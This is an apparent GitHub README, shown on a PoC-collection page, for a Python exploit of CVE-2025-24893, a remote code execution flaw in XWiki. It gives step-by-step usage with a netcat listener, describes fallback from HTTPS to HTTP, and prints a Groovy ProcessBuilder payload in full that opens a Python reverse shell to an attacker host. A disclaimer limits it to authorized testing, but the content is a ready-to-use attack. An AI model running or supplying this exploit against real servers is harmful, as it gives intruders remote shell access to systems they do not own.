来源

关联漏洞

描述

Modified exploit for CVE-2025-24893

介绍

# CVE-2025-24893 XWiki RCE Exploit

![Exploit Banner](https://img.shields.io/badge/CVE-2025--24893-critical)

A simple Python3 script to exploit **CVE-2025-24893**, a remote code execution vulnerability in XWiki Platform, using a Groovy-based async macro and a configurable reverse shell payload.

> **⚠️ WARNING:** This tool is provided **for educational and authorized testing purposes only**. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.

---

## Table of Contents

- [Features](#features)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Detection & Protocol Fallback](#detection--protocol-fallback)
- [Reverse Shell Payload](#reverse-shell-payload)
- [License](#license)
- [Disclaimer](#disclaimer)

---

## Features

- ✅ Automatically detects whether the target supports HTTPS or HTTP  
- ✅ Constructs a Groovy `ProcessBuilder` snippet to avoid `Runtime.exec` quirks  
- ✅ URL-encodes the XWiki async+groovy macro payload  
- ✅ Configurable reverse shell (host + port)  
- ✅ Prints HTTP response code to help verify delivery  

---

## Requirements

- Python 3.6 or higher  
- [`requests`](https://pypi.org/project/requests/) library  

```bash
pip install requests
````

---

## Installation

Clone this repository:

```bash
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893
```
---

## Usage

```bash
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
```

* `<TARGET_DOMAIN>`
  The XWiki host (e.g. `wiki.example.local`).

* `<LHOST>`
  Your attacker machine’s IP (where your listener is running).

* `<LPORT>`
  Your listener port (integer).

---

### Example

1. Start a listener on your machine:

```bash
nc -lvnp 4444
```

2. Run the exploit:

```bash
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
```

3. On success, check your `netcat` listener for a shell.

---

## Detection & Protocol Fallback

Before sending the payload, the script:

1. Tries `https://<TARGET_DOMAIN>`
2. Falls back to `http://<TARGET_DOMAIN>` if HTTPS fails
3. Exits if neither is reachable

This helps ensure compatibility with mixed‐protocol deployments.

---

## Reverse Shell Payload

By default, the script uses a Python3 one-liner:

```groovy
new ProcessBuilder(
  ['/bin/bash','-c',
   'python3 -c \'import socket,subprocess,os;'
   's=socket.socket();s.connect(("LHOST",LPORT));'
   'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
   'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
```

* You can modify the `build_payload()` function if you need a different shell (e.g. Bash, Perl, PHP, etc.).

---

## License

This project is licensed under the **MIT License**. See the [LICENSE](LICENSE) file for details.

---

## Disclaimer

This tool is designed for **authorized security assessment** and **educational purposes** only. The authors hold no responsibility for misuse. Always obtain explicit permission before testing any target systems.

文件快照

 [4.0K]  /data/pocs/35b241f6d36b3cf693dc9631fa33e0e9551e1464
├── [2.6K]  exploit.py
├── [1.0K]  LICENSE
└── [3.0K]  README.md

0 directories, 3 files

备注